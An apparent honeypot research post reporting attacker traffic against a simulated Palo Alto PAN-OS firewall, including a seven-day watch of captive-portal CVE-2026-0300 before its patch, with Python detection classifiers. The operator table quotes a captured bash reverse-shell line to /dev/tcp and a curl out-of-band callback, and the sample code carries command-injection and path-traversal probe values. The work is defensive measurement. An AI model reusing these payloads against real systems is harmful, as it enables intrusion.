Live observations — updated 13 May 2026 — CVE-2026-0300 patch day April–May 2026

Palo Alto Honeypot — How Fast Do Attackers Find Your Firewall?

We deployed a high-fidelity Palo Alto PAN-OS honeypot across three sensors and waited. In the first two weeks, 440+ unique source IPs probed the management interface, captive portal, GlobalProtect VPN, and XML API — producing nearly 47,000 events. The original post asked whether the five monitored CVEs would ever attract real exploit traffic. They did: 90 CVE-exploitation attempts have now been observed. In May 2026, a new vulnerability — CVE-2026-0300, an unauthenticated captive-portal buffer overflow — added a seventh observation window. We tracked attacker behaviour for seven days ahead of the vendor patch.

Total events: 46,800+
Unique sources: 440+
SSH login attempts: 17,000+
Sensors: 3
Services: 5
CVE attempts: 90

What We Deployed

The honeypot presents itself as a Palo Alto PAN-OS firewall management interface, complete with five distinct services that real PAN-OS devices expose:

| Service | What It Mimics | What We Capture |
|---|---|---|
| Management WebUI | PAN-OS login page with model/version footer | Credentials, CVE exploitation attempts, recon patterns |
| GlobalProtect VPN | Portal and gateway with prelogin/login endpoints | VPN credentials, client metadata, SESSID abuse |
| XML API | Full API with keygen, operational commands, config | API key generation, config read/write/commit attempts |
| SSH CLI | Interactive PAN-OS shell with show/configure commands | Full command history, config changes, credentials |
| Captive Portal | Network authentication redirect page | Portal credentials, redirect URL analysis |

Each instance has a unique identity — different model, serial number, TLS certificate, and PAN-OS version — so no two sensors share fingerprints visible to scanners.

CVE Detection — What We’re Watching For

Palo Alto firewalls have been the target of multiple critical vulnerabilities in 2024–2025. Our honeypot detects exploitation attempts for five actively exploited CVEs:

| CVE | CVSS | Attack Vector | Detection Method |
|---|---|---|---|
| CVE-2024-3400 | 10.0 | SESSID cookie path traversal on GlobalProtect | Regex on SESSID for ../ and ${IFS} |
| CVE-2024-0012 | 9.8 | Authentication bypass via X-PAN-AUTHCHECK header | Header value check on all requests |
| CVE-2021-3064 | 9.8 | HTTP smuggling on GlobalProtect | CL+TE header mismatch detection |
| CVE-2025-0108 | 8.8 | Path confusion via double-encoded traversal | Detect %2e%2e after URL decode on /unauth/ |
| CVE-2024-9474 | 7.2 | Command injection in user parameter | Regex on user field for backticks and $() |
| CVE-2026-0300 (NEW) | Critical | Unauthenticated stack buffer overflow in captive-portal /php/uid.php and /php/login.php endpoints | 11 custom Suricata rules (SIDs 9026300–9026310): oversize body, A-run, shellcode patterns, self-doxxing UA; see the CVE-2026-0300 section below |
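As an added illustration of the detection-method column (example code written for this page, not the honeypot's own rule engine), a Python classifier that applies each of the five original methods to a request record and tallies hits the way the results table does. The request layout (method, path, headers, body) and the sample traffic are assumptions of the example.

```python
import re
from urllib.parse import unquote

def detect_panos_cves(req):
    """Set of CVE tags one request matches, per the detection-method column."""
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    path, _, query = req.get("path", "").partition("?")
    body = req.get("body", "")
    tags = set()
    # CVE-2024-3400: SESSID cookie value carrying ../ or ${IFS}
    m = re.search(r"SESSID=([^;]*)", headers.get("cookie", ""))
    if m and re.search(r"\.\./|\$\{IFS\}", unquote(m.group(1))):
        tags.add("CVE-2024-3400")
    # CVE-2024-0012: clients never send X-PAN-AUTHCHECK, so its presence on
    # any request is the bypass probe, whatever the value
    if "x-pan-authcheck" in headers:
        tags.add("CVE-2024-0012")
    # CVE-2021-3064: Content-Length and Transfer-Encoding together (CL+TE)
    if "content-length" in headers and "transfer-encoding" in headers:
        tags.add("CVE-2021-3064")
    # CVE-2025-0108: one URL-decode pass still leaves %2e%2e under /unauth/
    if "/unauth/" in path and "%2e%2e" in unquote(path).lower():
        tags.add("CVE-2025-0108")
    # CVE-2024-9474: backticks or $( in the user parameter (query or body)
    m = re.search(r"(?:^|&)user=([^&]*)", query + "&" + body)
    if m and re.search(r"`|\$\(", unquote(m.group(1))):
        tags.add("CVE-2024-9474")
    return tags

def tally(requests):
    """Per-CVE counts plus the generic any-CVE count, like the results table."""
    counts = {"paloalto_cve_attempt": 0}
    for req in requests:
        tags = detect_panos_cves(req)
        counts["paloalto_cve_attempt"] += bool(tags)
        for t in tags:
            counts[t] = counts.get(t, 0) + 1
    return counts

# Constructed sample traffic for this example, not honeypot captures.
SAMPLES = [
    {"method": "GET", "path": "/", "headers": {"X-PAN-AUTHCHECK": "off"}, "body": ""},
    {"method": "GET", "path": "/global-protect/login.esp",
     "headers": {"Cookie": "SESSID=/../../tmp/probe"}, "body": ""},
    {"method": "POST", "path": "/global-protect/login.esp", "body": "0\r\n\r\n",
     "headers": {"Content-Length": "5", "Transfer-Encoding": "chunked"}},
    {"method": "GET", "path": "/unauth/%252e%252e/php/login.php", "headers": {}, "body": ""},
    {"method": "POST", "path": "/php/login.php", "headers": {}, "body": "user=$(id)&passwd=x"},
]
```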

CVE Exploitation — What We Actually Saw

The original version of this post said “no CVE exploits observed yet.” That is no longer true. After two weeks of internet exposure across both sensors, the honeypot has captured 90 distinct CVE-exploitation attempts against four of the five monitored CVEs:

| CVE | Generic cve_attempt hits | CVE-specific rule hits | Notes |
|---|---|---|---|
| CVE-2024-0012 | | 27 | By far the most-attempted CVE — X-PAN-AUTHCHECK header probes |
| CVE-2024-3400 | | 7 | SESSID path traversal — attackers know the GlobalProtect endpoint |
| CVE-2025-0108 | | 6 | Double-encoded path confusion under /unauth/ |
| CVE-2024-9474 | | 5 | Command injection in user parameter |
| CVE-2021-3064 | | 0 | CL+TE smuggling not observed yet |
| Generic paloalto_cve_attempt rule (any of above + heuristics) | 90 | 45 | Total signal — double-counts events that hit both a generic and a specific rule |

CVE-2024-0012 leading the table is consistent with reports from Censys, Greynoise, and Palo Alto’s own Unit 42 advisories — the X-PAN-AUTHCHECK auth-bypass is trivially scriptable and indexes well in scanner playbooks. By contrast we have not seen a single CVE-2021-3064 attempt: HTTP smuggling requires a more delicate request-pair and isn’t a fit for spray-and-pray scanning.

What Attackers Do When They Find Your PAN-OS

Two weeks of observation across both sensors makes the reconnaissance pattern much clearer than the early-snapshot version of this post. The four phases are still recognisable but the volumes have grown an order of magnitude:

PHASE 1 Discovery & Path Probing (713 events)
Scanners hit random paths looking for known web applications. They don’t know it’s a Palo Alto yet — they’re spraying common paths like /favicon.ico, /.well-known/, /robots.txt, and framework-specific paths. Most return 404 and move on. Tagged as PANOS_PROBE + PANOS_RECON.
PHASE 2 Captive Portal Interaction (430 events)
HTTP requests to port 6080 get redirected to the captive portal login page. Automated scanners follow the redirect and discover an authentication form. Some attempt to submit credentials through the portal — indicating they recognise it as a network access control point. PROD2 (the public-facing OVH sensor) captured the bulk of this traffic; the LAN sensor sees less because the captive portal port isn’t directly DNAT’d.
PHASE 3 Login Page Access & CVE Probing (135 events)
Targeted scanners find the management login at /php/login.php. At this point they know it’s PAN-OS — the page title, CSS structure, and PHPSESSID cookie confirm it. Some immediately attempt admin/admin default credentials. This is also where the bulk of the CVE-attempt traffic lands — X-PAN-AUTHCHECK header probes and double-encoded path-traversal under /unauth/. Tagged PANOS_ACCESS, PANOS_CVE, PANOS_CVE_2024_0012.
PHASE 4 Credential & SSH Brute-Force (44,800+ events)
Once identified as PAN-OS, the attack volume explodes — 27,830 SSH connection attempts plus 16,941 credential submissions on the CLI port. Web-side, attackers also try API key generation via /api/?type=keygen and GlobalProtect prelogin enumeration. The SSH brute-force never stops: it averages roughly 2,000 attempts per day from hundreds of distinct sources.

SSH CLI — What Happens After Login

Our SSH honeypot on port 2200 accepts all credentials and presents an interactive PAN-OS shell. Over 1,000 SSH sessions were recorded, with attackers running reconnaissance commands and attempting configuration changes:

| Event Type | Count | Severity | Attacker Goal |
|---|---|---|---|
| SSH session opened | 27,830 | LOW | Pure connection attempts (banner grab + drop) |
| SSH credential submission | 16,941 | MEDIUM | Credential stuffing / brute force |
| Default-credential pair (admin/admin etc.) | 317 | MEDIUM | Out-of-the-box config probing |
| show system info | 18 | LOW | Version fingerprinting |
| configure mode | 8 | HIGH | Persistence — enter config mode |
| set / delete (config write) | 4 | CRITICAL | Configuration tampering |
| commit | 4 | CRITICAL | Apply configuration changes |
| request system restart | 3 | CRITICAL | Disruption — reboot attempt |
| debug commands (priv-esc surface) | 6 | HIGH | Internal-state inspection |

PAN-OS vs FortiGate — Attack Pattern Comparison

We run both PAN-OS and FortiGate honeypots on the same sensors. The attack patterns differ significantly:

| Metric | FortiGate | PAN-OS |
|---|---|---|
| Time to first scan | Minutes | Minutes |
| Primary attack | CVE-2022-40684 (auth bypass) | Credential stuffing + API probing |
| VPN targeting | SSL VPN login spray | GlobalProtect prelogin enumeration |
| SSH component | Not available | Full CLI with config mode tracking |
| CVE exploitation | Active (CVE-2022-40684 common) | Active (90 attempts on 4/5 CVEs — CVE-2024-0012 leads) |

Key Findings

  • PAN-OS management interfaces are found within minutes. Internet-wide scanners actively probe for the distinctive PAN-OS HTTP fingerprint (empty Server header, PHPSESSID cookie, PHP-era Expires date).
  • SSH brute-force is overwhelmingly dominant. 17,000+ credential submissions on port 2200 in two weeks, sustained at ~2,000/day from hundreds of unique sources — orders of magnitude more than every web-side attack combined.
  • CVE-2024-0012 is what scanners actually try. X-PAN-AUTHCHECK header probes (27 hits) far outpace the other monitored CVEs. CVE-2024-3400 (7) and CVE-2025-0108 (6) follow at much lower rates. CVE-2021-3064 (HTTP smuggling) was not seen at all — spray-and-pray scanners avoid attacks that need careful request-pair construction.
  • The captive portal is an unexpected attack surface. Ports 6080/6082 attracted 430 events — more reconnaissance traffic than the management web UI itself. Attackers treat any authentication form as a target.
  • API enumeration happens quickly. Within hours of deployment, scanners discovered /api/?type=keygen and attempted credential-based API key generation. We have observed 14 API config-read attempts and 9 API config-write attempts.
  • The two-sensor split tells the deployment-context story. The internet-facing OVH sensor (PROD2) sees SSH credential traffic from 439 unique sources; the LAN-side DEV sensor sees the same traffic via firewall DNAT but at much higher absolute volumes (39K events) because the DNAT exposes the SSH and web ports to the wider internet for longer.

CVE-2026-0300 — Captive Portal Buffer Overflow: 7-Day Live Observation

On 2026-05-06 Palo Alto Networks disclosed CVE-2026-0300 — an unauthenticated stack buffer overflow in the User-ID captive-portal component of PAN-OS, reachable on the dedicated captive-portal ports (TCP 4443, 6080, 6081, 6082) without any credential. We already had captive-portal ports live on all three sensors. We wrote 11 custom Suricata detection rules (SIDs 9026300–9026310) on disclosure day and tracked the pre-patch operator pool for seven days until the vendor patch landed on 2026-05-13.

The short version: the actual CVE attack shape — oversize POST body to /php/uid.php with buffer-overflow padding — was never observed in the wild on our sensors during the seven-day window. What we did observe was more revealing about how operators behave in the days between a disclosure and its patch.

The vulnerability

The affected endpoints (/php/uid.php, /php/login.php, /php/captiveportal.php) are served on separate TCP ports that are exposed by default when the captive-portal feature is enabled — independent of whether the management WebUI is internet-accessible. A single unauthenticated POST with a sufficiently large body can overflow a stack buffer in the C-based User-ID backend. No authentication, no prior session, no special headers required. Proof-of-concept code (qassam-315, p3Nt3st3r-sTAr) was public on disclosure day.

Operators we observed — by behaviour, not by name

| Date (CEST) | Operator type | Technique | SID fired | Assessment |
|---|---|---|---|---|
| 2026-05-06 | Scanner (FPT Vietnam) | Self-doxxing UA: Mozilla/5.0 (CVE-2026-0300-Checker) | 9026307 | Exposure inventory, not exploit. Declared the CVE in the User-Agent string. |
| 2026-05-10 | Exploitation attempt (DE-hosted) | 2120-byte A-run preamble then POST /php/login.php with bash reverse-shell body: bash -i >& /dev/tcp/…/443 0>&1 | 9026305, 9026306 | Real exploit attempt. Only one seen across 7 days, no follow-up. Suricata initially mis-classified the flow as TLS — the TCP-layer rules (9026305, 9026306) caught it regardless. |
| 2026-05-11 | Exposure survey (US hosting) | 355 events / 65 min, UA: panos-cve-2026-0300-exposure-survey/1.0. Probed /php/uid.php specifically (correct CVE endpoint, unlike public PoCs which target /php/login.php). | 9026307 | Sophisticated recon: correct endpoint, self-identifying UA, brief burst then gone. One brief return burst the next day, then permanently silent. |
| 2026-05-11–12 | Generic fuzzer (OVH VPS) | 927 events over 9 hours; hybrid probe: i386 ROP-shaped pointer chain + {curl,http://<interactsh>} OOB callback + 518-byte A-run query string. Nuclei template set. | 9026305, 9026310 | Not CVE-2026-0300-specific — a kitchen-sink Nuclei run against any captive-portal surface. The OOB token links it to ProjectDiscovery tooling. Noteworthy: 9026305 correctly fired despite the GET-not-POST shape. |
| 2026-05-06–12 | Coordinated scanner clusters | Two /24 clusters active throughout the window: China-Mobile-allocated /24 (14 distinct IPs) and Aeza International /22 (26+ IPs). TLS fingerprint-only, no POST body, no CVE-aware UA. | none | Background recon layer. China-Mobile /24 went silent at 20:00 CEST patch eve. Aeza continued. |
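As an added example (not HoneyLens code) for the CVE-2026-0300 surface described above, a Python classifier that sorts captive-portal requests into the behaviour categories in this table: self-doxxing UA, padding run, oversize POST to a vulnerable endpoint, or background noise. The size thresholds, the request layout and the sample requests are assumptions of the example, not the SID 9026300–9026310 rule values.

```python
import re

# Thresholds are assumptions for this example, not the HONEYLENS rule values.
CP_ENDPOINTS = {"/php/uid.php", "/php/login.php", "/php/captiveportal.php"}
OVERSIZE_BODY = 1024            # bytes of POST body treated as oversize
A_RUN = re.compile(r"A{256,}")  # padding run of at least 256 'A's
SELF_DOX_UA = re.compile(r"cve[-_]?2026[-_]?0300", re.IGNORECASE)

def classify_captive_portal(req):
    """Sort one request seen on a captive-portal port into the observation
    categories used in the table above.  Returns (category, findings)."""
    path, _, query = req.get("path", "").partition("?")
    body = req.get("body", "")
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    findings = set()
    if SELF_DOX_UA.search(headers.get("user-agent", "")):
        findings.add("self-doxxing-ua")      # declares the CVE it is checking for
    if A_RUN.search(query) or A_RUN.search(body):
        findings.add("a-run")                # overflow-style padding, GET or POST
    if (req.get("method") == "POST" and path in CP_ENDPOINTS
            and len(body.encode()) >= OVERSIZE_BODY):
        findings.add("oversize-post")        # the actual CVE attack shape
    if "oversize-post" in findings:
        return "exploit-shape", findings
    if "a-run" in findings:
        return "padding-probe", findings     # e.g. a generic fuzzer's GET
    if "self-doxxing-ua" in findings:
        return "exposure-survey", findings   # inventory, not exploitation
    return "background", findings            # TLS fingerprinters, crawlers

def summarise(requests):
    """Category counts over a window, so a patch-day 'all zeros' is checkable."""
    out = {}
    for req in requests:
        cat, _ = classify_captive_portal(req)
        out[cat] = out.get(cat, 0) + 1
    return out

# Constructed requests modelled on the behaviours in the table, not captures.
SAMPLES = [
    {"method": "GET", "path": "/php/uid.php", "body": "",
     "headers": {"User-Agent": "panos-cve-2026-0300-exposure-survey/1.0"}},
    {"method": "GET", "path": "/php/login.php?q=" + "A" * 518, "headers": {}, "body": ""},
    {"method": "POST", "path": "/php/login.php", "headers": {}, "body": "A" * 2120},
    {"method": "GET", "path": "/", "headers": {"User-Agent": "Mozilla/5.0"}, "body": ""},
]
```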

The detection engineering story

We iterated the rule set across all seven days as we observed new evasion shapes. Three additions were driven by real traffic, not theory:

Patch day outcome

On 2026-05-13 the vendor patch was released. By evening, zero HONEYLENS SID firings across all three sensors. Zero oversize POST bodies. Zero shellcode. Every tracked exploitation-intent IP was absent. The China-Mobile /24 cluster — the most consistent presence across all seven pre-patch days — made a final burst on patch eve at 18:00 CEST and went silent.

What replaced them: Censys cataloguing /php/login.php in its crawl template (will continue indefinitely), a Dshield-listed /24 doing a Citrix/VPN-appliance sweep across all three sensors in sequence, and routine TLS fingerprinters. The exploitation-active population withdrew cleanly at patch time.

The CVE-specific exploit rules (9026300–9026304) never fired on real traffic across seven days. The actual BoF attack shape — a correctly-formed oversize POST to the vulnerable User-ID endpoint — was not observed in the wild on our sensor surface during the pre-patch window. Whether that reflects targeted (non-internet-visible) exploitation or operators holding PoCs until after patch analysis, we cannot say.

Observation days: 7
Custom rules written: 11
HONEYLENS SID firings: ~12
Exploit-shape POSTs: 0
Self-doxxing operators: 2
Real exploit attempts: 1

Data captured by HoneyLens sensor network across 3 deployment sites between 12 Apr and 13 May 2026. The PAN-OS honeypot implements 6 CVE detections (5 original + CVE-2026-0300) with 33 distinct attack-type classifications plus 11 custom Suricata rules for the captive-portal BoF surface. Each instance uses a unique identity (serial, TLS certificate, hostname) to prevent cross-sensor fingerprint correlation.